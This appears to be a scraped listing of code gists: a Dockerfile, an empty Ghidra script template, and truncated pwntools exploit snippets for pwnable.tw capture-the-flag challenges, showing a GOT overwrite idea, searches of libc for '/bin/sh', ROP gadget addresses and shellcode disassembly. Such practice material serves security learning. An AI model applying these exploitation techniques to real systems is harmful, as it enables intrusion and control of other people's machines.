This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ubuntu:18.04 | |
# Install dependencies | |
RUN apt-get -y update; \ | |
apt-get install -y --no-install-recommends \ | |
ca-certificates build-essential \ | |
autoconf automake cmake dpkg-dev file git make patch \ | |
libc-dev libc++-dev libgcc-8-dev libstdc++-8-dev python python-dev \ | |
dirmngr gnupg2 lbzip2 wget xz-utils libtinfo5; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#TODO write a description for this script | |
#@author Chengbin, MyriaCore | |
#@category Functions | |
#@keybinding | |
#@menupath | |
#@toolbar | |
#TODO Add User Code Here |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
''' | |
control ebp to control the stack, so can modify atoi got | |
这道题的关键还是通过控制ebp来控制对atoi的got表项进行修改 | |
''' | |
def addDevice(device_num): | |
p.recvuntil('>') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
silver_bullet = ELF('./silver_bullet') | |
libc = ELF('./libc_32.so.6') | |
#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'}) | |
p = remote('chall.pwnable.tw', 10103) | |
p.recvuntil('Your choice :') | |
p.sendline('1') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"}) | |
p = remote('chall.pwnable.tw', 10102) | |
libc = ELF('./libc_32.so.6') | |
binsh_addr = 0 | |
for address in libc.search('/bin/sh\x00'): | |
print("/bin/sh address is " + str(hex(address))) | |
binsh_addr = address |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
libc = ELF('./libc.so.6') | |
binsh_addr = 0 | |
for address in libc.search('/bin/sh\x00'): | |
print(address) | |
binsh_addr = address | |
break |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from struct import pack | |
#/bin/sh/ = 0x6e69622f,0x0068732f | |
addr1 = 0x8070880 # int 80; ret | |
addr2 = 0x807cb7f # inc eax; ret | |
addr3 = 0x80908d0 # mov eax, 7;ret | |
addr4 = 0x80701aa # pop edx; ret | |
addr5 = 0x80701d1 # pop ecx; pop ebx; ret |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
''' | |
e: b8 05 00 00 00 mov $0x5,%eax | |
13: bb 9f a0 04 08 mov addr(shellcode+0x39),%ebx | |
18: b9 9a 02 00 00 mov $0x29a,%ecx | |
1d: ba 00 00 00 00 mov $0x0,%edx | |
22: cd 80 int $0x80 | |
24: 89 c3 mov %eax,%ebx | |
27: b8 03 00 00 00 mov $0x3,%eax |